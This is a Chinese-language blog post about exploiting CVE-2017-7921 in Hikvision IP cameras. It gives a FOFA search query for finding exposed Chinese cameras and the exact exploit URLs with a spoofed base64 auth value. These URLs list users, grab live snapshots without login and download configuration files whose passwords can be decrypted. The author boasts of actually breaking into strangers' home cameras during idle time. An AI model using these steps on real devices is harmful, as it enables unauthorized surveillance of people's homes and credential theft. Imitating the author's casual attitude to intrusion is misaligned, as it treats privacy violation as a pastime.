海康威视摄像头入侵+fofa(CVE-2017-7921)

By:Jesse

---

重保期间实在是太无聊，于是就找了个海康威视的摄像头日日玩，结果一玩就是一天呢哈哈哈。

CVE-2017-7921

通过构造url进行检索所有用户、屏幕截图、配置文件下载，通过解码工具破解后台的账户密码，从而实时监控，想想还是非常危险的，万一入侵到别人家里的摄像头，你的生活全在别人的屏幕前。在把玩的过程中的确找到了别人家里的摄像头。

HikvisionDS-2CD2xx2F-ISeries5.2.0build140721
版本至5.4.0build160530版本；
DS-2CD2xx0F-ISeries5.2.0build140721
版本至5.4.0Build160401版本；
DS-2CD2xx2FWDSeries5.3.1build150410
版本至5.4.4Build161125版本；
DS-2CD4x2xFWDSeries5.2.0build140721
版本至5.4.0Build160414版本；
DS-2CD4xx5Series5.2.0build140721
版本至5.4.0Build160421版本；
DS-2DFxSeries5.2.0build140805
版本至5.4.5Build160928版本；
DS-2CD63xxSeries5.0.9build140305
版本至5.3.5Build160106版本

那么后台地址去哪里找呢？，我使用得fofa但是这个网站没有会员的话比较不友好。

app="HIKVISION-视频监控" && country="CN"

可以到海康威视的摄像头在世界上的占有率相关可观，在中国应该算是业界老大，那这么多摄像头，一定会有没有及时打补丁的吧！

具体利用过程
1.利用路径：http://camera.ip/Security/users?auth=YWRtaW46Mg
YWRtaW46Mg admin:2的base64编码
实际上这边只要不是1都可以访问到，可以看到只有一个账户是admin

2，无需身份验证即可获取相机快照
利用路径：http://camera.ip/onvif-http/snapshot?auth=YWRtaW46Mg

细思极恐啊！！！！未授权直接就看到画面了，即使你破解不了密码，你设置一个刷新频率，也能实时监控画面。在fofa搜索的过程中，的的确确入侵到别人家里的摄像头了非常之恐怖。

3.最糟糕的是，可以下载相机配置：
利用路径：http://camera.ip/System/configurationFile?auth=YWRtaW46Mg

omg！！！

不幸的是，配置备份文件包含所有配置用户的用户名和纯文本密码。虽然文件被加密，但加密很容易逆转，因为海康威视选择使用静态加密密钥，该密钥源自密码“abcdefg”。其他海康威视产品也有类似的弱加密机制。

BUT！！！办法总比困难多，网上比较多的是csdn的下载但是要money，怎么能便宜了这些资本家呢，github有解码脚本，但是不太好找。

4.解码过程，获得密码

成功入侵~~~太可怕了

官方是没有给过修复建议的，就不要安装有问题的摄像头吧真的挺危险的。

2017 年 3 月 5 日：发现后门。
2017 年 3 月 6 日：海康威视通知了后门，提供了技术细节。
2017 年 3 月 7 日：海康威视确认漏洞并承诺固件更新。
2017 年 3 月 12 日：海康威视向合作伙伴发布了一份关于该漏洞的备忘录。海康威视开始为受影响的设备发布固件更新。
2017 年 5 月 4 日：ICS-Cert 发布咨询 ICSA-17-124-01
2017 年 9 月 11 日：完整披露分发列表中发布的漏洞详细信息。

https://packetstormsecurity.com/files/144097/hikvisionip-bypass.txt